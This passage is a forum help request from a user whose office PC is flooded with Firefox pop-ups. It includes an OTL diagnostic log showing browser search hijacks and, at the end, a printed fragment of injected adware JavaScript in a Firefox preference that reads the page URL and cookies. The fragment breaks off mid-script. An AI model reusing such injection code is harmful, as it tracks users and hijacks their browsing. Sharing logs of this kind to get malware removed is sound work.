Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Pop-ups, ad-ware, browsing is almost impossible, please help! [Clo


  • This topic is locked This topic is locked

#1
valgalvez

valgalvez

    Member

  • Member
  • PipPip
  • 32 posts

I'm not sure what kind of computer this is, I believe it was built by our IT guys, but when I pull up properties it says the processor is Intel Pentium CPU G2030, Windows 7, 64 bit...we've only had it about 8 months and never had any problems until about 2 weeks ago..we use Firefox browser and it is inundated with pop-ups and ad ware..here is the OTL log , your help is greatly appreciated!

 

OTL logfile created on: 9/2/2014 2:53:58 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\administrator\Downloads
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17239)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.69 Gb Total Physical Memory | 5.06 Gb Available Physical Memory | 65.78% Memory free
15.38 Gb Paging File | 12.54 Gb Available in Paging File | 81.57% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 465.66 Gb Total Space | 407.30 Gb Free Space | 87.47% Space Free | Partition Type: NTFS
 
Computer Name: OFFICE2 | User Name: Administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/09/02 14:53:32 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Administrator\Downloads\OTL.exe
PRC - [2014/07/16 22:42:02 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/07/14 10:08:54 | 000,861,672 | ---- | M] (PC Utilities Software Limited) -- C:\Program Files (x86)\Optimizer Pro\OptProReminder.exe
PRC - [2014/07/09 03:17:07 | 001,869,488 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
PRC - [2014/05/08 06:48:38 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/04/10 15:25:46 | 001,186,112 | ---- | M] (SAMSUNG Electornics Co., Ltd.) -- C:\Users\Administrator\AppData\Roaming\VERIZON\UA_ar\UA.exe
PRC - [2013/11/20 16:43:26 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
PRC - [2013/11/20 16:43:14 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
PRC - [2013/11/04 14:07:12 | 007,651,840 | ---- | M] () -- C:\Program Files (x86)\High Meadow Business Solutions\RetailEdge 8.2\Server\RetailEdge_Server_8_0.exe
PRC - [2013/11/01 10:22:46 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe
PRC - [2013/10/24 08:33:36 | 000,044,736 | ---- | M] (ArcSoft, Inc.) -- C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
PRC - [2013/08/30 00:47:34 | 004,858,968 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
PRC - [2013/08/30 00:47:33 | 000,046,808 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2013/07/02 09:16:32 | 000,507,264 | ---- | M] (Oracle Corporation) -- C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
PRC - [2012/09/11 13:59:46 | 000,365,344 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2012/09/11 13:59:44 | 000,277,792 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
PRC - [2012/09/01 18:07:22 | 000,285,240 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2012/09/01 18:07:22 | 000,014,904 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2012/08/21 06:32:04 | 000,166,720 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/07/05 08:23:18 | 000,129,856 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
PRC - [2012/05/20 09:26:26 | 000,291,648 | R--- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
PRC - [2012/04/16 14:45:38 | 000,119,808 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\updateui.exe
PRC - [2012/04/16 11:55:02 | 000,648,512 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\ismagent.exe
PRC - [2009/07/08 16:45:34 | 000,131,072 | ---- | M] (FUJITSU LIMITED) -- C:\Windows\twain_32\Fjscan32\FjtwMkup.exe
PRC - [2009/06/11 20:05:34 | 000,290,816 | ---- | M] (PFU LIMITED) -- C:\Windows\twain_32\Fjscan32\ERG\FTErGuid.exe
PRC - [2008/12/09 20:54:40 | 000,143,360 | ---- | M] (PFU LIMITED) -- C:\Windows\twain_32\Fjscan32\SOP\FtLnSOP.exe
PRC - [2007/10/16 19:58:38 | 000,045,056 | ---- | M] (PFU LIMITED) -- C:\Windows\twain_32\Fjscan32\FTPWREVT\FTPWREVT.exe
PRC - [2007/07/24 11:15:14 | 000,185,632 | ---- | M] (Protexis Inc.) -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
PRC - [2007/03/08 16:23:04 | 000,045,056 | ---- | M] (PFU LIMITED) -- C:\Windows\twain_32\Fjscan32\FJTWMKSV.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/07/16 22:42:24 | 003,800,688 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/07/09 03:17:07 | 017,029,808 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
MOD - [2014/02/27 04:06:22 | 001,091,072 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\0bedc417d3c5dcb1c9a5f15dd733c556\System.ServiceModel.Web.ni.dll
MOD - [2014/02/27 04:05:28 | 002,997,760 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\1e5e19d119e04b93da3d45153abd60fd\System.IdentityModel.ni.dll
MOD - [2014/02/27 04:05:25 | 019,693,056 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\24bf0c88c0465485f4b842df043b3f45\System.ServiceModel.ni.dll
MOD - [2014/02/27 04:05:15 | 000,029,696 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\IAStorDataMcfeeca6f#\c168447e4d828f48b0b416bb0dc128bb\IAStorDataMgrSvcInterfaces.ni.dll
MOD - [2014/02/27 04:05:14 | 000,026,112 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\IAStorCommon\ea7a8fb74933181836838ff94b5d04d3\IAStorCommon.ni.dll
MOD - [2014/02/27 04:05:12 | 000,371,200 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\IAStorUtil\59bbcc02f949910c4baae888c45e90d7\IAStorUtil.ni.dll
MOD - [2014/02/27 04:03:00 | 012,894,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\f4f6ee0df2aa4189bf36e6335cb92761\System.Windows.Forms.ni.dll
MOD - [2014/02/27 04:02:55 | 001,644,544 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\5cd2aee5e7c07227c694d89219688ab3\System.Drawing.ni.dll
MOD - [2014/02/27 04:02:54 | 000,806,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\34b53ecafa1d7ccc7ca961d722b5d983\System.ServiceModel.Internals.ni.dll
MOD - [2014/02/27 04:02:54 | 000,122,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\78652b7fa68ee058bff6a118c657f565\SMDiagnostics.ni.dll
MOD - [2014/02/27 04:02:53 | 002,825,216 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\f6d7bb59f318c130d68816a89335d05e\System.Runtime.Serialization.ni.dll
MOD - [2014/02/27 04:02:46 | 007,662,080 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\bada32953bb6b16a53d653eae23d78dc\System.Xml.ni.dll
MOD - [2014/02/27 04:02:46 | 006,990,336 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\dce99d8de14d8a015313db98c72552ee\System.Core.ni.dll
MOD - [2014/02/27 04:02:43 | 000,976,384 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\bbc48ec4245e502ae19b0601d3799c9e\System.Configuration.ni.dll
MOD - [2014/02/27 04:02:42 | 010,060,800 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ff26cc03e6d57d8abd13b990332e67c6\System.ni.dll
MOD - [2014/02/27 04:02:37 | 016,953,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll
MOD - [2013/09/14 02:51:02 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll
MOD - [2013/09/14 02:50:36 | 001,242,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll
MOD - [2013/09/05 01:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2012/04/16 14:45:38 | 000,119,808 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\updateui.exe
MOD - [2012/04/16 11:56:26 | 000,500,032 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\plugin\PServerPlugin.dll
MOD - [2012/04/16 11:42:40 | 000,015,872 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\featureController.dll
MOD - [2012/04/16 11:41:50 | 000,484,864 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\DeviceProfile.dll
MOD - [2012/04/16 11:38:16 | 000,013,824 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\eventsSender.dll
MOD - [2011/08/17 16:48:24 | 000,322,048 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\log4cplus.dll
MOD - [2011/08/17 16:48:22 | 000,195,584 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\libgsoap.dll
MOD - [2011/08/17 16:41:36 | 000,400,384 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\sqlite3.dll
MOD - [2011/08/15 20:17:30 | 009,224,704 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtGui4.dll
MOD - [2011/08/15 20:15:44 | 000,382,464 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtXml4.dll
MOD - [2011/08/15 20:12:04 | 002,603,520 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtCore4.dll
MOD - [2011/08/15 20:12:04 | 001,006,592 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtNetwork4.dll
MOD - [2011/08/15 19:23:00 | 000,062,464 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\zlib1.dll
MOD - [2011/07/19 16:05:40 | 014,978,048 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtWebKit4.dll
MOD - [2011/07/19 16:04:56 | 000,317,952 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\phonon4.dll
MOD - [2011/02/18 10:04:04 | 000,196,448 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office14\IEAWSDC.DLL
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/07/25 06:00:25 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/08/30 00:47:33 | 000,046,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV:64bit: - [2013/05/26 22:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel®
SRV:64bit: - [2012/02/09 16:26:48 | 000,133,632 | ---- | M] () [Auto | Running] -- C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe -- (ISCTAgent)
SRV:64bit: - [2009/07/13 18:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV:64bit: - [2009/07/13 18:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\rundll32.exe -- (70e6ca8c)
SRV - [2014/07/16 22:42:18 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/07/09 03:17:07 | 000,262,320 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/08 06:48:38 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/03/20 15:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2014/01/18 14:23:02 | 003,568,168 | ---- | M] (NCH Software) [On_Demand | Stopped] -- C:\Program Files (x86)\NCH Software\ExpressAccounts\expressaccounts.exe -- (ExpressAccountsService)
SRV - [2013/12/22 21:46:12 | 000,095,280 | ---- | M] (Prosoftnet) [Auto | Running] -- C:\Program Files (x86)\IDriveWindows\id_service.exe -- (IDriveService)
SRV - [2013/11/04 14:07:12 | 007,651,840 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\High Meadow Business Solutions\RetailEdge 8.2\Server\RetailEdge_Server_8_0.exe -- (Service_DB)
SRV - [2013/10/25 09:45:02 | 001,929,272 | ---- | M] (NCH Software) [On_Demand | Stopped] -- C:\Program Files (x86)\NCH Software\Inventoria\inventoria.exe -- (InventoriaService)
SRV - [2013/10/24 08:33:36 | 000,044,736 | ---- | M] (ArcSoft, Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe -- (ADExchange)
SRV - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012/09/20 23:12:30 | 000,276,288 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/09/11 13:59:46 | 000,365,344 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/11 13:59:44 | 000,277,792 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/01 18:07:22 | 000,014,904 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/08/21 06:32:04 | 000,166,720 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/07/05 08:23:18 | 000,129,856 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe -- (Intel®
SRV - [2007/07/24 11:15:14 | 000,185,632 | ---- | M] (Protexis Inc.) [Auto | Running] -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2)
SRV - [2007/03/08 16:23:04 | 000,045,056 | ---- | M] (PFU LIMITED) [Auto | Running] -- C:\Windows\twain_32\Fjscan32\FJTWMKSV.exe -- (FJTWMKSV)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/08/28 03:17:06 | 000,034,752 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WPRO_41_2001.sys -- (WPRO_41_2001)
DRV:64bit: - [2014/08/06 16:29:08 | 000,061,584 | ---- | M] (StdLib) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\{55dce8ba-9dec-4013-937e-adbf9317d990}w64.sys -- ({55dce8ba-9dec-4013-937e-adbf9317d990}w64)
DRV:64bit: - [2013/08/30 00:48:10 | 001,030,952 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswSnx.sys -- (aswSnx)
DRV:64bit: - [2013/08/30 00:48:10 | 000,378,944 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswSP.sys -- (aswSP)
DRV:64bit: - [2013/08/30 00:48:10 | 000,204,880 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:64bit: - [2013/08/30 00:48:10 | 000,072,016 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr)
DRV:64bit: - [2013/08/30 00:48:10 | 000,065,336 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:64bit: - [2013/08/30 00:48:10 | 000,064,288 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswTdi.sys -- (aswTdi)
DRV:64bit: - [2013/08/30 00:48:09 | 000,080,816 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV:64bit: - [2013/08/30 00:48:09 | 000,033,400 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV:64bit: - [2013/05/28 17:24:48 | 000,203,672 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudmdm.sys -- (ssudmdm)
DRV:64bit: - [2013/05/28 17:24:48 | 000,103,064 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudbus.sys -- (dg_ssudbus)
DRV:64bit: - [2012/09/17 01:24:00 | 005,338,848 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:64bit: - [2012/09/01 18:01:56 | 000,028,216 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorF.sys -- (iaStorF)
DRV:64bit: - [2012/07/02 10:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2012/06/18 16:40:50 | 000,342,528 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2012/05/20 09:25:32 | 000,789,824 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc)
DRV:64bit: - [2012/05/20 09:25:32 | 000,357,184 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub)
DRV:64bit: - [2012/05/20 09:25:32 | 000,019,264 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs)
DRV:64bit: - [2012/02/29 23:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/02/09 16:24:16 | 000,044,992 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ISCTD64.sys -- (ISCT)
DRV:64bit: - [2012/02/09 16:24:16 | 000,025,536 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\imsevent.sys -- (imsevent)
DRV:64bit: - [2012/02/09 16:24:14 | 000,025,536 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ikbevent.sys -- (ikbevent)
DRV:64bit: - [2011/08/23 06:57:24 | 000,565,352 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2011/03/10 23:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/10 23:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/20 20:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 20:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/20 20:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 20:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2009/11/17 16:12:00 | 000,032,344 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBfilt64.sys -- (MBfilt)
DRV:64bit: - [2009/07/13 18:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 18:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 18:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/10 13:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 13:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 13:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 13:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2009/07/13 18:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://astromenda.co...r=828474337&ir=
IE:64bit: - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://astromenda.co...r=828474337&ir=
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = AF CE 88 A4 17 1A CF 01  [binary data]
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://astromenda.co...r=828474337&ir=
IE - HKCU\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/...Box&FORM=IE11SR
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.startup.homepage: "https://webmail.eart...&x=-1703872102"
FF - prefs.js..extensions.HIMiTzG.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-